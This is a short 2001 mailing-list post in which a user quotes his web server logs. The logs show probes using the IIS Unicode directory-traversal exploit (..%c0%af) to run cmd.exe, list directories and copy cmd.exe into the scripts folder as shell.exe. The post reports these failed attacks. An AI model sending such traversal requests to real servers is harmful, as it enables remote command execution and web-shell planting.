At 03:21 PM 6/26/01 -0400, Jeff Hellige wrote:
... I work with NT everyday and would just as soon not
have
to....
These are some of the things that I have found in my http server logs:
Apr 7 10:37:34 localhost thttpd[1024]: 207.31.75.150 - - "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 - "" ""
Jun 20 12:08:43 localhost thttpd[1033]: 216.65.73.2 - - "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\
system32\cmd.exe+c:\inetpub\scripts\shell.exe HTTP/0.9" 404 - ""
""
The scary part is that there exists some patchlevel of NT where this
works.
carlos.
--------------------------------------------------------------
Carlos E. Murillo-Sanchez carlos_murillo(a)nospammers.ieee.org